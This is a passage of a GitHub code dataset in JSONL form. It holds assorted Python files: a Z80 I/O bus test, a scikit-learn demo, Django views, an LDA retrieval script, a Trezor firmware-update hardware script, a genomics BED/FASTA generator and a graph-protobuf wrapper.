_fill_world_map(prg_rom_bytes, workbook.create_sheet(\"ワールドマップ\"))\n _fill_enemy_group_pattern_list(prg_rom_bytes, workbook.create_sheet(\"敵グループパターンリスト\"))\n workbook.save(args.output_excel_file_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"applemon8080/jvq-analysis","sub_path":"jvqdump.py","file_name":"jvqdump.py","file_ext":"py","file_size_in_byte":73446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72625409927","text":"import unittest\nfrom pyz80.iobus import *\nfrom unittest import mock\n\nclass TestIOBus(unittest.TestCase):\n def test_read(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n devices[n].read.side_effect = lambda a : a + n\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n self.assertEqual(a+n, UUT.read(n, a))\n devices[n].read.assert_called_once_with(a)\n for device in devices:\n if device != devices[n]:\n device.read.assert_not_called()\n\n def test_write(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n UUT.write(n, a, mock.sentinel.data)\n devices[n].write.assert_called_once_with(a, mock.sentinel.data)\n for device in devices:\n if device != devices[n]:\n device.write.assert_not_called()\n\nclass TestDevice(unittest.TestCase):\n def test_responds_to_port(self):\n UUT = Device()\n for n in range(0,256):\n self.assertFalse(UUT.responds_to_port(n))\n\n def test_read(self):\n UUT = Device()\n for a in range(0,256):\n self.assertEqual(0x00, UUT.read(a))\n\n def test_write(self):\n UUT = Device()\n for a in range(0,256):\n UUT.write(a, 
mock.sentinel.data)\n","repo_name":"jamespbarrett/pyz80","sub_path":"tests/test_iobus.py","file_name":"test_iobus.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"18896582886","text":"\"\"\"Напишите программу, в которой вычисляется факториал числа.\nФакториалом n! числа n называется произведение всех чисел от единицы\nдо этого числа: n! = 1 Г 2 Г 3 Г … Г n. Число, для которого вычисляется\nфакториал, вводится пользователем с клавиатуры.\"\"\"\n\nn = input(\"Введите число: \")\n\nif not n.isdigit():\n print(\"Неверный ввод!\")\n exit()\n\nfactorial = 1\nfor i in range(1, int(n) + 1):\n factorial *= i\n\nprint(f\"{n}! = {factorial}\")\n","repo_name":"widgeton/PythonExercises","sub_path":"01.Acquaintance/01.07.py","file_name":"01.07.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"840902074","text":"#%%\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\n\n#%%\n# SUMMARY OF LOGISTIC REGRESSION MODEL:\n# ---------------------------------------------\n# 1. Create a model with LogisticRegression().\n# 2. Train the model with model.fit().\n# 3. Make predictions with model.predict().\n# 4. Validate the model with accuracy_score(). \n\n#%%\nX, y = make_blobs(centers=2, random_state=42)\n\nprint(f\"Labels: {y[:10]}\")\nprint(f\"Data: {X[:10]}\")\n# %%\nplt.scatter(X[:, 0], X[:, 1], c=y)\n\n# %%\n# Training and testing the model\nX_train, X_test, y_train, y_test = train_test_split(X,\n y, random_state=1, stratify=y)\n# %%\n# Instantiate a Logistic Regression Model\n\nclassifier = LogisticRegression(solver='lbfgs', random_state=1)\nclassifier\n\nLogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,\n intercept_scaling=1, l1_ratio=None, max_iter=100,\n multi_class='warn', n_jobs=None, penalty='12',\n random_state=1, solver='lbfgs', tol=0.0001, verbose=0,\n warm_start=False)\n# %%\n# Train the Logistic Regression model\nclassifier.fit(X_train, y_train)\n\n#%%\n# Validate the logistic regression model\npredictions = classifier.predict(X_test)\npd.DataFrame({\"Prediction\": predictions, \"Actual\": y_test})\n# Evaluate the performance of the predictions\naccuracy_score(y_test, predictions)\n\n#%%\n# Classify if the next point is purple or yellow\nnew_data = np.array([[-2, 6]])\nplt.scatter(X[:, 0], X[:, 1], c=y)\nplt.scatter(new_data[0, 0], new_data[0, 1], c=\"r\", marker=\"o\", s=100)\nplt.show()\n# %%\npredictions = classifier.predict(new_data)\nprint(\"Classes are either 0 (purple) or 1 (yellow)\")\nprint(f\"The new point was classified as: {predictions}\")\n# %%\n","repo_name":"ines-tb/MachineLearning-analysis","sub_path":"logistic_regression/demo/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1512611402","text":"from django.conf.urls.defaults import patterns, url, include\nfrom django.contrib import admin\n\nfrom transmogrifier.settings import MEDIA_ROOT\nfrom messportal import urls\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n \n url(r'^media/(?P.*)$',\n 'django.views.static.serve',\n 
{ 'document_root': MEDIA_ROOT }),\n\n url(r'^admin/',\n include(admin.site.urls)\n ),\n\n url(r'^',\n include('transmogrifier.messportal.urls')\n ),\n )\n","repo_name":"s-ramaswamy/transmogrifier","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3094468591","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.red),#Redirect from startpage\n url(r'^admin/', admin.site.urls),#standart adminpanel\n url(r'^index/', include('index.urls')),#index app\n url(r'^metrics/', include('metrics.urls')),#metrics app\n url(r'^auth/', include('auth.urls')),#auth app\n url(r'^books/', include('books.urls')),#books app\n]\n","repo_name":"ptera-py/hlaf","sub_path":"hlaf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17363648724","text":"import pickle\nfrom pathlib import Path\nfrom typing import List\n\nimport click\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import Trainer\n\nfrom src.data_loading.load_augsburg15 import Augsburg15Dataset, collate_augsburg15_detection\nimport torch\n\nfrom src.models.soft_teacher import SoftTeacher\n\n\ndef _get_evaluation_data_loader(evaluation_dataset_name):\n root_directory, image_info_csv, dataset_type = Augsburg15Dataset.DATASET_MAPPING[evaluation_dataset_name]\n dataset = Augsburg15Dataset(\n root_directory=root_directory,\n image_info_csv=image_info_csv,\n transforms=[],\n dataset_type=dataset_type,\n )\n return DataLoader(\n dataset,\n batch_size=1,\n collate_fn=collate_augsburg15_detection,\n drop_last=True,\n num_workers=4\n )\n\n\ndef _make_validation_predictions(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1,\n train_dataset=None,\n validation_dataset=None,\n test_dataset=None,\n )\n model.eval()\n device = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')\n model.to(device)\n\n results = []\n\n for index, sample in enumerate(data_loader):\n image, target = sample\n\n image = image.to(device)\n\n result = model(image)\n results.append(\n (result[0]['boxes'].detach().cpu(), result[0]['labels'].detach().cpu(), result[0]['scores'].detach().cpu()))\n\n with open(checkpoint_path.parent / f'predictions_{evaluation_dataset_name}.pkl', 'wb') as file:\n pickle.dump(results, file)\n\n\ndef _run_test_set(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1\n )\n\n trainer = Trainer(\n gpus=1 if torch.cuda.is_available() else 0,\n precision=16,\n )\n results = trainer.test(\n model,\n dataloaders=data_loader,\n ckpt_path=checkpoint_path\n )\n with open(checkpoint_path.parent / f'results_{evaluation_dataset_name}.pkl', 'w') as file:\n file.write(str(results))\n\n\ndef _run_evaluation_for_experiment(\n ckpt_path: Path,\n evaluation_datasets: List[str]\n):\n ckpt_path = Path(ckpt_path)\n for evaluation_dataset in evaluation_datasets:\n _make_validation_predictions(ckpt_path, evaluation_dataset)\n 
_run_test_set(ckpt_path, evaluation_dataset)\n\n\n@click.command()\n@click.option(\n '--checkpoint_path',\n required=True,\n multiple=True,\n help='Which checkpoints to use for evaluation.'\n)\n@click.option(\n '--evaluation_dataset_group',\n default='evaluate_2016augsburg15',\n help='Which datasets to use for evaluation.'\n)\ndef run_evaluation_for_experiments(\n checkpoint_path,\n evaluation_dataset_group: str\n):\n if evaluation_dataset_group == 'evaluate_2016augsburg15':\n evaluation_datasets = [\n 'validation_synthesized_2016_augsburg15',\n 'test_synthesized_2016_augsburg15',\n 'test_synthesized_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_raw':\n evaluation_datasets = [\n 'validation_raw_2016_2018_augsburg15',\n 'test_raw_2016_2018_augsburg15',\n 'test_raw_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_synthesised':\n evaluation_datasets = [\n 'validation_synthesized_2016_2018_augsburg15',\n 'test_synthesized_2016_2018_augsburg15',\n 'test_synthesized_manual_set'\n ]\n else:\n raise ValueError(f'No such evaluation_dataset_group: {evaluation_dataset_group}')\n\n for ckpt_path in checkpoint_path:\n _run_evaluation_for_experiment(ckpt_path, evaluation_datasets)\n\n\nif __name__ == '__main__':\n run_evaluation_for_experiments()\n","repo_name":"MilesGrey/ssl-pollen-detection","sub_path":"run_evaluation.py","file_name":"run_evaluation.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"44942357341","text":"import os\nimport json\nimport pickle as pkl\nfrom collections import defaultdict, Counter\n\nimport numpy as np\nfrom tqdm import tqdm\n\nimport read_ap\nimport download_ap\n\nfrom gensim_corpus import GensimCorpus, BOWCorpus, TFIDFCorpus, ModelCorpus\nfrom gensim.models import LdaModel\nfrom gensim.matutils import kullback_leibler, sparse2full\n\nfrom trec import TrecAPI\n\nimport argparse\n\nclass LatentDirichletAllocation():\n \"\"\"\n This class implements latent dirichlet allocation using the gensim library.\n \"\"\"\n def __init__(self, corpus, num_topics=500, iterations=2000, passes=20, eval_every=None, embedding=\"bow\"):\n\n self.lda_model_path = \"./saved_models/gensim-lda-model-nt-{}.mm\".format(num_topics)\n self.lda_corpus_path = \"./saved_models/gensim-lda-nt-{}-corpus.crp\".format(num_topics)\n\n self.index_path = \"./saved_models/gensim-lda-model.pkl\"\n self.lda_corpus_path = \"./saved_models/gensim-lda-corpus.crp\"\n\n self.corpus = corpus\n self.num_topics = num_topics\n self.lda_corpus = []\n\n if os.path.exists(self.lda_model_path):\n print(\"LDA model already trained, loading from disk.\")\n self.model = LdaModel.load(self.lda_model_path)\n\n else:\n\n # Make a index to word dictionary.\n temp = corpus.dictionary[0] # This is only to \"load\" the dictionary.\n id2word = corpus.dictionary.id2token\n\n print(\"Training LDA model.\")\n self.model = LdaModel(\n corpus=list(corpus.get_corpus()),\n id2word=id2word,\n iterations=iterations,\n num_topics=num_topics,\n eval_every=eval_every\n )\n\n self.model.save(self.lda_model_path)\n\n self.lda_corpus = ModelCorpus(corpus.get_corpus(), self.model, path=self.lda_corpus_path, persist=True)\n\n self.lda_corpus_pers = [sparse2full(doc, self.num_topics) for doc in self.lda_corpus]\n\n def search(self, query):\n\n query_repr = read_ap.process_text(query)\n vec_query = self.corpus.dictionary.doc2bow(query_repr)\n lda_query = 
sparse2full(self.model[vec_query], self.num_topics)\n\n results = defaultdict(float)\n for doc_id, lda_doc_repr in zip(self.corpus.doc_ids, self.lda_corpus_pers):\n results[doc_id] = kullback_leibler(lda_query, lda_doc_repr)\n\n results = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}\n return list(results.items())\n\nif __name__ == \"__main__\":\n\n os.makedirs(\"results\", exist_ok=True)\n os.makedirs(\"saved_models/sim_temps\", exist_ok=True)\n os.makedirs(\"raw_output\", exist_ok=True)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-embedding\", type=str, default=\"tfidf\", help=\"Embedding to use in training LDA.\")\n parser.add_argument(\"-num_topics\", type=int, default=500, help=\"Number of topics to use in training LDA.\")\n args = parser.parse_args()\n\n num_topics = args.num_topics\n # ensure dataset is downloaded\n download_ap.download_dataset()\n # pre-process the text\n docs_by_id = None\n docs_by_id = read_ap.get_processed_docs()\n\n gensim_corpus = GensimCorpus(docs_by_id, args.embedding)\n\n lda = LatentDirichletAllocation(gensim_corpus, eval_every=None, num_topics=num_topics, embedding=args.embedding)\n\n # read in the qrels\n qrels, queries = read_ap.read_qrels()\n\n overall_ser = {}\n\n print(\"Running LDA benchmark\")\n\n # Write results to trec-style file\n if not os.path.exists(\"lda_results.out\"):\n\n # collect results\n for qid in tqdm(qrels):\n query_text = queries[qid]\n\n results = lda.search(query_text)\n overall_ser[qid] = dict(results)\n\n results_lines = []\n for qid in overall_ser:\n for doc_id in overall_ser[qid]:\n results_lines.append(str(qid) + '\\tQO\\t' + doc_id + '\\t0\\t' + str(overall_ser[qid][doc_id]) + '\\tSTANDARD\\n')\n with open('./raw_output/lda_results.out', 'w') as f:\n f.writelines(results_lines)\n\n trec = TrecAPI('D:/Google Drive/Documenten/UVA/MSc AI/Information Retrieval 1/trec_eval-master/trec_eval.exe')\n metrics = trec.evaluate(test_file_name='datasets/ap/qrels.tsv', prediction_file_name='./raw_output/lda_results.out', metrics_to_capture={'map', 'ndcg'})\n\n # dump this to JSON\n # *Not* Optional - This is submitted in the assignment!\n with open(\"./results/lda-{}-topics.json\".format(num_topics), \"w\") as writer:\n json.dump(metrics, writer, indent=1)","repo_name":"davidvos/master-projects","sub_path":"information-retrieval/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31211244358","text":"import logging\n\nfrom csm_api_client.service.gateway import APIError, APIGatewayClient\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass JobstatClient(APIGatewayClient):\n base_resource_path = 'statechecker/jobstat/'\n\n def get_all(self):\n \"\"\"Get all results from Job State Checker.\n\n Returns:\n A list of dictionaries where each dictionary pertains to a\n single job.\n\n Raises:\n APIError: if there is a failure querying the Job State Checker API\n or getting the required information from the response.\n \"\"\"\n err_prefix = 'Failed to get State Checker data'\n try:\n response = self.get('all').json()\n return response['jobstat']\n except APIError as err:\n raise APIError(f'{err_prefix}: {err}')\n except ValueError as err:\n raise APIError(f'{err_prefix} due to bad JSON in response: {err}')\n except KeyError as err:\n raise APIError(f'{err_prefix} due to missing {err} key in 
response.')\n","repo_name":"Cray-HPE/sat","sub_path":"sat/apiclient/jobstat.py","file_name":"jobstat.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"25315972081","text":"from django.shortcuts import render\nfrom models import Bride, Groom, Party,Venue\n\n# Create your views here.\n\ndef get_index(request):\n brides=Bride.objects.filter()\n bride=brides[0]\n grooms=Groom.objects.filter()\n groom=grooms[0]\n party=Party.objects.filter()\n venues=Venue.objects.filter()\n\n return render(request, 'homepage.html',{'bride':bride,'groom':groom,'party':party,'venues':venues})","repo_name":"Cvd2014/LeahWedding","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42423516753","text":"#!/usr/bin/env -S python3 -u\n# This is just a dirty playground, do not use.\n# It will be refactored over time.\n\nimport os\nimport sys\nimport serial\nimport time\nimport yaml\nimport datetime\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.safe_load(ymlfile)\n\nuhub_loction = cfg['usb_location'];\nuhub_port = cfg['usb_port'];\narduino_serial = cfg['arduino_serial'];\n\ndef trezor_poweroff():\n now();\n print(\"[hardware/usb] Turning power off...\");\n os.system((\"uhubctl -l {} -p {} -r 100 -a off > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef trezor_poweron():\n now();\n print(\"[hardware/usb] Turning power on...\");\n os.system((\"uhubctl -l {} -p {} -a on > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef touch(ser, location, action):\n now();\n print(\"[hardware/trezor] Touching the {} button by {}...\".format(location, action));\n ser.write((\"{} {}\\n\".format(location, action)).encode())\n\ndef wait(seconds):\n now();\n print(\"[software] Waiting for {} seconds...\".format(seconds));\n time.sleep(seconds);\n\ndef now():\n print(\"\\n[timestamp] {}\".format(datetime.datetime.now()));\n\ndef update_firmware(ser, version):\n if \"http\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -u {} &\".format(version);\n elif \"bin\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -f {} &\".format(version);\n else:\n unofficial = False;\n trezorctlcmd = \"trezorctl firmware-update -v {} &\".format(version);\n trezor_poweroff();\n if \"1.8\" in version:\n touch(ser, \"left\", \"press\");\n else:\n touch(ser, \"all\", \"press\");\n wait(2);\n trezor_poweron();\n wait(2);\n touch(ser, \"all\", \"unpress\");\n print(\"[software/trezorctl] Updating the firmware to {}...\".format(version));\n os.system(trezorctlcmd);\n wait(3);\n touch(ser, \"right\", \"click\");\n wait(20);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(10);\n trezor_poweroff();\n trezor_poweron();\n if unofficial: touch(ser, \"right\", \"click\");\n if unofficial: wait(5);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(5);\n os.system(\"trezorctl get-features|grep version\");\n\ndef main():\n ser = serial.Serial(arduino_serial, 9600)\n update_firmware(ser, sys.argv[1]);\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"mmahut/tpmb","sub_path":"scripts/updatefw.py","file_name":"updatefw.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} 
+{"seq_id":"14850475972","text":"#!/usr/bin/python3\n\nimport json\nimport re\nfrom Bio.Data import CodonTable\nfrom Bio import SeqIO\nimport sys\nimport os\n\n\ndef make_bed_and_fasta(cand_list, frame_dic, genome, prot_dic, selection_file):\n bed_dic = {}\n fasta_dic = {}\n\n frame_color_dic = {}\n\n frame_color_dic[1] = \"255,26,26\"\n frame_color_dic[2] = \"26,26,255\"\n frame_color_dic[3] = \"45,185,45\"\n frame_color_dic[4] = \"172,0,230\"\n frame_color_dic[5] = \"230,115,0\"\n frame_color_dic[6] = \"0,230,184\"\n\n bed_temp = \"{0} {1} {2} {3} 0 {4} {1} {2} {5} 1 {6} 0 1 1\"\n track_description = ('track name=\"Candidates\" description=\"Candidate\"'\n 'visibility=2 itemRgb=\"On\"')\n translation_table = CodonTable.ambiguous_dna_by_id[11]\n\n start_regex = re.compile('|'.join(translation_table.start_codons))\n canno_start_regex = re.compile(\"ATG|ATB|ATD|ATH|ATK|ATM|ATN|ATR|ATS|ATV|\" +\n \"ATX|DTG|MTG|NTG|RTG|VTG|WTG|XTG\")\n as_regex = re.compile(\"[IL]\")\n for i, orf in enumerate(cand_list):\n species = orf.split(\"|\")[0]\n psms = prot_dic[\"SIHUMI\"][\"6frame\"][orf]\n\n strand = \"+\" if orf.split(\"|\")[3] == \"1\" else \"-\"\n start = int(orf.split(\"|\")[4].split(\"-\")[0])\n stop = int(orf.split(\"|\")[4].split(\"-\")[1])\n chrom = orf.split(\"|\")[1]\n protein_seq = frame_dic[orf].seq\n\n if strand == \"+\":\n nuc_seq = genome[species][chrom][start:stop].seq\n else:\n nuc_seq = genome[species][chrom][start:stop].seq.reverse_complement()\n trans = nuc_seq.translate()\n if str(trans) != str(protein_seq):\n print(\"error! 6frame not equal to genome\")\n print(orf)\n raise\n\n if \"*\" in trans:\n print(\"error! stop codon in translation\")\n print(orf)\n raise\n pep_starts = []\n\n pep_start_dic = {}\n for psm in psms:\n peptide = psm[\"pep\"]\n pep_seq_regex = as_regex.sub(\"[IL]\", peptide)\n starts = [m.start() for m in re.finditer(pep_seq_regex,\n str(protein_seq))]\n pep_start_dic[min(starts)] = peptide\n pep_starts += starts\n\n # start of startcodons\n canno_start_starts = []\n for m in re.finditer(canno_start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n canno_start_starts.append(m.start())\n\n start_starts = []\n for m in re.finditer(start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n start_starts.append(m.start())\n\n # calculate first start codon before mapped pep start\n min_start = min(pep_starts)\n '''\n for psm in psms:\n peptide = psm[\"pep\"]\n if peptide == pep_start_dic[min_start]:\n print(peptide)\n break\n '''\n # looks if a cannonical start exist if not take also alternatives,\n # if that does not exist 0 is assumed\n next_start_codon = max([start for start in canno_start_starts if start <=\n min_start * 3] + [-1])\n if next_start_codon < 0:\n next_start_codon = max([start for start in start_starts if start <=\n min_start * 3] + [0])\n '''\n print(next_start_codon)\n print(start_starts)\n print(canno_start_starts)\n print(min_start)\n '''\n if strand == \"+\":\n start = start + next_start_codon\n frame = start % 3 + 1\n else:\n stop = stop - next_start_codon\n frame = stop % 3 + 4\n rgb = frame_color_dic[frame]\n name = selection_file + \"_\" + str(i + 1)\n if strand == \"+\":\n cand_seq = genome[species][chrom][start:stop].seq.translate()\n else:\n cand_seq = genome[species][chrom][start:stop].seq.reverse_complement().translate()\n\n fasta_dic[name] = \">\" + name + \"\\n\" + str(cand_seq) + \"\\n\"\n if species not in bed_dic.keys():\n bed_dic[species] = [track_description]\n\n bed_dic[species].append(bed_temp.format(chrom, start, stop, name,\n 
strand, rgb, stop - start))\n\n return bed_dic, fasta_dic\n\n\ndef main():\n selection_cut_off = int(sys.argv[1])\n selection_file = \"nov_psm\" + str(selection_cut_off)\n\n with open(\"./parameters.json\", \"r\") as file_handle:\n data_dir = json.load(file_handle)['data_dir']\n\n with open(\"./SIHUMI_info_dic.json\", \"r\") as file_handle:\n SIHUMI_info_dic = json.load(file_handle)\n\n db_dir = data_dir + \"/dbs\"\n frame_path = db_dir + \"/SIHUMI_6frame.fasta\"\n frame_dic = SeqIO.index(frame_path, \"fasta\")\n\n genome_dir = data_dir + \"/genome\"\n genome = {}\n for genbank_file in os.listdir(genome_dir):\n if genbank_file.endswith(\".gbk\"):\n species = genbank_file.split(\".\")[0]\n genome_path = genome_dir + \"/\" + genbank_file\n genome[species] = SeqIO.to_dict(SeqIO.parse(genome_path, \"genbank\"))\n\n accu_data_dir = data_dir + \"/accumulated_data\"\n\n with open(accu_data_dir + \"/prot_dic.json\", \"r\") as file_handle:\n prot_dic = json.load(file_handle)\n\n cand_dir = data_dir + \"/candidates\"\n with open(cand_dir + \"/\" + selection_file + \"_list.json\", \"r\") as file_handler:\n cand_list = json.load(file_handler)\n\n bed_dic, fasta_dic = make_bed_and_fasta(cand_list, frame_dic, genome,\n prot_dic, selection_file)\n\n bed_dir = cand_dir + \"/bed_dir/\" + selection_file + \"/\"\n for species in SIHUMI_info_dic.keys():\n with open(bed_dir + species + \"_cand.bed\", \"w\") as file_handler:\n file_handler.write(\"\\n\".join(bed_dic[species]) + \"\\n\")\n\n blast_dir = cand_dir + \"/blast/{}/\".format(selection_file)\n for name, content in fasta_dic.items():\n with open(blast_dir + name + \".fasta\", \"w\") as file_handler:\n file_handler.write(content)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n'''\n'''\n","repo_name":"JohnBioinf/PROTMAP_scripts","sub_path":"candidates/make_bed_and_fasta.py","file_name":"make_bed_and_fasta.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71082188809","text":"from django.shortcuts import render,HttpResponseRedirect\nfrom .forms import LoginForm,TractorForm\nfrom .models import TractorDetail\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate,login,logout\nfrom .forms import MyUserCreationForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\ndef home_page(request):\n fm=TractorDetail.objects.all()\n return render(request,'app/tractorlist.html',{'form':fm})\n\ndef detail_page(request,pk):\n dt=TractorDetail.objects.filter(pk=pk)\n return render(request,'app/detail.html',{'data':dt})\n\ndef registration_page(request):\n if request.method==\"POST\":\n fm=MyUserCreationForm(request.POST)\n if fm.is_valid() :\n messages.success(request,'Congratulations You have registered ')\n fm.save()\n fm=MyUserCreationForm()\n else: \n fm=MyUserCreationForm()\n return render(request,'app/registration.html',{'form':fm})\n\ndef login_page(request):\n if request.method==\"POST\":\n fm=LoginForm(request,data=request.POST)\n if fm.is_valid():\n un=fm.cleaned_data['username']\n pa=fm.cleaned_data['password']\n User=authenticate(username=un,password=pa)\n if User is not None:\n login(request,User)\n return HttpResponseRedirect('/tractorreg/')\n else:\n fm=LoginForm()\n return render(request,'app/login.html',{'form':fm})\n \n@ login_required(login_url='/login/') \ndef tractorreg_page(request):\n if request.method==\"POST\":\n user=request.user\n fms=TractorForm(request.POST)\n if 
fms.is_valid():\n brand= fms.cleaned_data['brand']\n model_no= fms.cleaned_data['model_no']\n hp_category= fms.cleaned_data['hp_category']\n implements= fms.cleaned_data['implements']\n fm=TractorDetail(user=user,brand=brand,model_no=model_no,hp_category=hp_category,implements=implements)\n fm.save()\n messages.success(request,'Congratulations detail Updated Succefully ')\n fm=TractorForm()\n else:\n fm=TractorForm()\n return render(request,'app/tractorreg.html',{'form':fm,'active':'btn-primary'})\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/login/')\n\n ","repo_name":"yeshudeshmukh/tractorrecord","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15211449756","text":"from lt_sdk.proto import lgf_pb2, node_filters, ops_pb2\n\n\nclass LightGraph(object):\n \"\"\"\n Wrapper around lgf_pb2.LGF() protobuf with some helper functions\n Immutable data type\n \"\"\"\n\n CONTROL_FLOW_OPS = {\n ops_pb2.ENTER,\n ops_pb2.SWITCH,\n ops_pb2.MERGE,\n ops_pb2.NEXT_ITERATION,\n ops_pb2.EXIT,\n }\n\n CONST_OPS = {\n ops_pb2.CONST,\n ops_pb2.VARIABLE,\n }\n\n CONST_NODES = {\n lgf_pb2.LNF.const.DESCRIPTOR.name,\n lgf_pb2.LNF.variable.DESCRIPTOR.name,\n }\n\n IS_CONST_ATTR = \"is_constant\"\n\n def __init__(self,\n nodes,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n meta_graph_info=None):\n \"\"\"\n Params:\n subgraphs: a list of lgf_pb2.LNF() protobufs\n input_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_nodes: a optional list of strings corresponding to output node names\n meta_graph_info: an optional lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n input_edges = input_edges or []\n output_edges = output_edges or []\n output_node_names = output_node_names or []\n\n self._nodes = [self._copy_node(node) for node in nodes]\n self._input_edges = []\n input_names = set()\n for edge_info in input_edges:\n tup = (edge_info.name, edge_info.port)\n if tup not in input_names:\n input_names.add(tup)\n self._input_edges.append(self._copy_edge_info(edge_info))\n\n self._output_edges = [\n self._copy_edge_info(edge_info) for edge_info in output_edges\n ]\n self._output_node_names = list(output_node_names)\n\n if meta_graph_info is None:\n self._meta_graph_info = lgf_pb2.MetaGraphInfo()\n else:\n self._meta_graph_info = self._copy_meta_graph_info(meta_graph_info)\n\n # Dictionaries for fast lookups\n self._node_dict = {node.name: node for node in self._nodes}\n self._node_to_input_node_names = {node.name: set() for node in self._nodes}\n self._node_to_output_node_names = {node.name: set() for node in self._nodes}\n self._edge_dict = {}\n\n for node in self._nodes:\n # Input and output node names\n for e in node.inputs:\n if e.name in self._node_dict:\n self._node_to_input_node_names[node.name].add(e.name)\n self._node_to_output_node_names[e.name].add(node.name)\n for inp_name in node.control_inputs:\n if inp_name in self._node_dict:\n self._node_to_input_node_names[node.name].add(inp_name)\n self._node_to_output_node_names[inp_name].add(node.name)\n\n # Edges\n for e in list(node.inputs) + list(node.outputs):\n self._edge_dict[(e.name, e.port)] = e\n\n # Sort the input and output node names so they are always in the same order\n self._node_to_input_node_names = {\n k: sorted(v) for k,\n v in self._node_to_input_node_names.items()\n }\n 
